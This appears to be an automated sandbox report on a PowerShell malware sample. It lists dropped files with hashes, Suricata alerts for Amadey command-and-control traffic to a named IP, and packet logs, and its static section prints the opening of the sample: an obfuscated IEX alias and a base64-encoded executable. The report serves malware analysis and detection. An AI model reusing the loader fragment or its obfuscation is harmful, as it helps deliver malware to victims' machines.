                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.4.<./.P.i.

                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DE1.tmp.xml

                                                  Download File
                                                  Process:C:\Windows\System32\wermgr.exe
                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):4905
                                                  Entropy (8bit):4.686305846161819
                                                  Encrypted:false
                                                  SSDEEP:96:uIjfYI7On7VHJFKloFevAFqvWTzFevAFuJufqd:uIMYOn7j45H+slJufI
                                                  MD5:8DB06691CE92511BE5F47051B8462ECD
                                                  SHA1:BC4DED9A9372D468D23557232E3A90D0A3528E64
                                                  SHA-256:D1D85481AA84A0C719B6A516FD2EB8CD209F63C7DD4E023260AEA03911AD3FB1
                                                  SHA-512:EB4680C02DF9A04A814DB801642EC659C061E16A362C4B30FB1EFA2A21E79FD35308DBA0468DF1C598EE6C89C070AE1F26CBAD20BC93A46A8365B7F81B4C9EE0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="666644" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                  MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                  SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                  SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                  SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                  Malicious:false
                                                  Preview:@...e................................................@..........

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kpqwugii.j20.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olyabqw3.khj.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3H4WTEDDODRRWA7R5I0H.temp

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.738168188574685
                                                  Encrypted:false
                                                  SSDEEP:96:8odKU33CxHu5kvhkvCCt/xP5AH4xP5BHy:roUyO1/x9xy
                                                  MD5:2075D1AA710C95D624389E253E94275A
                                                  SHA1:E00250325274EF97A44745BE74160D8ADC68F564
                                                  SHA-256:6E07543A65679631EAE5328C4D629CBEA44A547CED1AC8AF8B13E02CD6678ECF
                                                  SHA-512:6CEA3D8CD9C62E11A9BD8003074242E1586639F159CAE1FF0A736731F536CB0198D1C20A6882FF485F11799FB6B40A238476982D727F1E31AAABB14AA882D791
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....K...a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....[..a......a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z6=...........................%..A.p.p.D.a.t.a...B.V.1.....(Z9=..Roaming.@......CW.^(Z9=...........................oY.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z<=....Q...........

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.738168188574685
                                                  Encrypted:false
                                                  SSDEEP:96:8odKU33CxHu5kvhkvCCt/xP5AH4xP5BHy:roUyO1/x9xy
                                                  MD5:2075D1AA710C95D624389E253E94275A
                                                  SHA1:E00250325274EF97A44745BE74160D8ADC68F564
                                                  SHA-256:6E07543A65679631EAE5328C4D629CBEA44A547CED1AC8AF8B13E02CD6678ECF
                                                  SHA-512:6CEA3D8CD9C62E11A9BD8003074242E1586639F159CAE1FF0A736731F536CB0198D1C20A6882FF485F11799FB6B40A238476982D727F1E31AAABB14AA882D791
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v....K...a..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....[..a......a......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^(Z6=...........................%..A.p.p.D.a.t.a...B.V.1.....(Z9=..Roaming.@......CW.^(Z9=...........................oY.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^(Z<=....Q...........

                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:MS Windows registry file, NT/2000 or above
                                                  Category:dropped
                                                  Size (bytes):1835008
                                                  Entropy (8bit):4.4662657290209005
                                                  Encrypted:false
                                                  SSDEEP:6144:xIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSb+:SXD94zWlLZMM6YFHc++
                                                  MD5:44EEC2B1FA90433ECAD10BCCE93A0EBE
                                                  SHA1:543480413B9D4E2509E867A7A97374112E8088AF
                                                  SHA-256:B0F7E33183E17EAB89DB7A006773BAB481BFCB05E629E0BD8609822E9C35E77D
                                                  SHA-512:90EB5F2F3FB09E165028DB6F8CD2ADA032D6DF63EFDF03ED0411654DF757E2493DAA5574F6C32987A77EE9D585C4A97CEDD67B2449FAB2F61D8F8F48507D6593
                                                  Malicious:false
                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..6.a................................................................................................................................................................................................................................................................................................................................................!.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                                  Entropy (8bit):5.378033187505597
                                                  TrID:
                                                    File name:nYT1CaXH9N.ps1
                                                    File size:698'189 bytes
                                                    MD5:ab733235a722c734fb8f19160825cef1
                                                    SHA1:162b73031c52d7356337479488d60c333f404fdd
                                                    SHA256:32e6d8538c6b1d47942918cef259a80e70f06feb0145d6e41d44ec5917435391
                                                    SHA512:64a26e92c00a7a61acf71fdf819874ef6ce976117ddcaa0bea5ea3d57e2c631ff5569fdea081c6a39c73aa3ae40b0c08a049d7233c2a7e94232543cb1c4e67f6
                                                    SSDEEP:12288:yfytehPmbJEW2WkiUHJcWzMkVjkMAkZZ7wyzDFBagP:5yWKV5jkUZUyzSgP
                                                    TLSH:0DE47C3A8117BEBE3A2E3E8C50083D451C586ED75768D658EFC89536B2DA280DE7C4F4
                                                    File Content Preview:ipconfig /flushdns.... $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

                                                    File Icon

                                                    Icon Hash:3270d6baae77db44

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-01-08T08:42:05.045163+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449737176.113.115.13180TCP
                                                    2025-01-08T08:42:09.575045+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449740176.113.115.13180TCP
                                                    2025-01-08T08:42:14.191636+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449745176.113.115.13180TCP
                                                    2025-01-08T08:42:16.679476+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449748176.113.115.13180TCP
                                                    2025-01-08T08:42:18.914485+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449749176.113.115.13180TCP
                                                    2025-01-08T08:42:23.498611+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449751176.113.115.13180TCP
                                                    2025-01-08T08:42:28.049493+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449753176.113.115.13180TCP
                                                    2025-01-08T08:42:32.618665+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449755176.113.115.13180TCP
                                                    2025-01-08T08:42:37.175436+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449757176.113.115.13180TCP
                                                    2025-01-08T08:42:41.763864+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.449759176.113.115.13180TCP
                                                    2025-01-08T08:42:46.302886+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455811176.113.115.13180TCP
                                                    2025-01-08T08:42:50.835270+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455813176.113.115.13180TCP
                                                    2025-01-08T08:42:55.381034+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455815176.113.115.13180TCP
                                                    2025-01-08T08:43:00.109511+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455838176.113.115.13180TCP
                                                    2025-01-08T08:43:04.628949+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455869176.113.115.13180TCP
                                                    2025-01-08T08:43:09.181141+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455897176.113.115.13180TCP
                                                    2025-01-08T08:43:13.708822+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455929176.113.115.13180TCP
                                                    2025-01-08T08:43:18.273842+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455961176.113.115.13180TCP
                                                    2025-01-08T08:43:22.831688+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.455988176.113.115.13180TCP
                                                    2025-01-08T08:43:27.388773+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456020176.113.115.13180TCP
                                                    2025-01-08T08:43:31.919921+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456051176.113.115.13180TCP
                                                    2025-01-08T08:43:36.481428+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456083176.113.115.13180TCP
                                                    2025-01-08T08:43:41.038224+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456100176.113.115.13180TCP
                                                    2025-01-08T08:43:45.574085+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456102176.113.115.13180TCP
                                                    2025-01-08T08:43:50.102710+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456104176.113.115.13180TCP
                                                    2025-01-08T08:43:54.672605+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456106176.113.115.13180TCP
                                                    2025-01-08T08:43:59.204325+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456108176.113.115.13180TCP
                                                    2025-01-08T08:44:03.754351+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456110176.113.115.13180TCP
                                                    2025-01-08T08:44:08.335762+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456112176.113.115.13180TCP
                                                    2025-01-08T08:44:12.906479+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456114176.113.115.13180TCP
                                                    2025-01-08T08:44:17.458560+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456116176.113.115.13180TCP
                                                    2025-01-08T08:44:22.035510+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456118176.113.115.13180TCP
                                                    2025-01-08T08:44:26.596671+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456120176.113.115.13180TCP
                                                    2025-01-08T08:44:31.162499+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456122176.113.115.13180TCP
                                                    2025-01-08T08:44:35.733585+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456124176.113.115.13180TCP
                                                    2025-01-08T08:44:40.266082+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456126176.113.115.13180TCP
                                                    2025-01-08T08:44:44.828367+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456128176.113.115.13180TCP
                                                    2025-01-08T08:44:49.376427+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456130176.113.115.13180TCP
                                                    2025-01-08T08:44:53.964871+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456132176.113.115.13180TCP
                                                    2025-01-08T08:44:58.568416+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456134176.113.115.13180TCP
                                                    2025-01-08T08:45:03.143637+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456136176.113.115.13180TCP
                                                    2025-01-08T08:45:07.716156+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456138176.113.115.13180TCP
                                                    2025-01-08T08:45:12.274753+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456140176.113.115.13180TCP
                                                    2025-01-08T08:45:16.834867+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456142176.113.115.13180TCP
                                                    2025-01-08T08:45:21.394060+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456144176.113.115.13180TCP
                                                    2025-01-08T08:45:25.968264+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456146176.113.115.13180TCP
                                                    2025-01-08T08:45:30.523002+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456148176.113.115.13180TCP
                                                    2025-01-08T08:45:35.080922+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456150176.113.115.13180TCP
                                                    2025-01-08T08:45:39.706832+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456152176.113.115.13180TCP
                                                    2025-01-08T08:45:44.265261+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456154176.113.115.13180TCP
                                                    2025-01-08T08:45:48.840371+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456156176.113.115.13180TCP
                                                    2025-01-08T08:45:53.412687+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456158176.113.115.13180TCP
                                                    2025-01-08T08:45:57.976589+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456160176.113.115.13180TCP
                                                    2025-01-08T08:46:02.527470+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.456162176.113.115.13180TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 8, 2025 08:42:02.106756926 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:02.111579895 CET8049733176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:02.111639977 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:02.113203049 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:02.117953062 CET8049733176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:02.811652899 CET8049733176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:02.811722040 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.321886063 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.322215080 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.326925039 CET8049733176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:04.326983929 CET4973380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.327047110 CET8049737176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:04.327111959 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.327261925 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:04.332041979 CET8049737176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:05.045120955 CET8049737176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:05.045162916 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.676472902 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.676892996 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.681621075 CET8049737176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:06.681687117 CET8049738176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:06.681690931 CET4973780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.681751966 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.683646917 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:06.688369989 CET8049738176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:07.377537966 CET8049738176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:07.377729893 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.882952929 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.883280039 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.888176918 CET8049740176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:08.888256073 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.888258934 CET8049738176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:08.888313055 CET4973880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.888348103 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:08.893112898 CET8049740176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:09.574858904 CET8049740176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:09.575045109 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.195833921 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.196202993 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.201105118 CET8049740176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:11.201122999 CET8049743176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:11.201184988 CET4974080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.201232910 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.201385021 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:11.206163883 CET8049743176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:11.897679090 CET8049743176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:11.897804976 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.414551020 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.415102005 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.419688940 CET8049743176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:13.419740915 CET4974380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.419910908 CET8049745176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:13.419972897 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.420110941 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:13.424995899 CET8049745176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:14.191576004 CET8049745176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:14.191636086 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.964517117 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.967736959 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.969587088 CET8049745176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:15.972079039 CET4974580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.972536087 CET8049748176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:15.974179029 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.978667021 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:15.983452082 CET8049748176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:16.679409027 CET8049748176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:16.679476023 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.196651936 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.197242022 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.201750994 CET8049748176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:18.201821089 CET4974880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.202044964 CET8049749176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:18.202114105 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.202264071 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:18.207083941 CET8049749176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:18.914427042 CET8049749176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:18.914484978 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.557661057 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.558000088 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.562798023 CET8049750176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:20.562860012 CET8049749176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:42:20.562869072 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.562911034 CET4974980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.566791058 CET4975080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:42:20.571547985 CET8049750176.113.115.131192.168.2.4
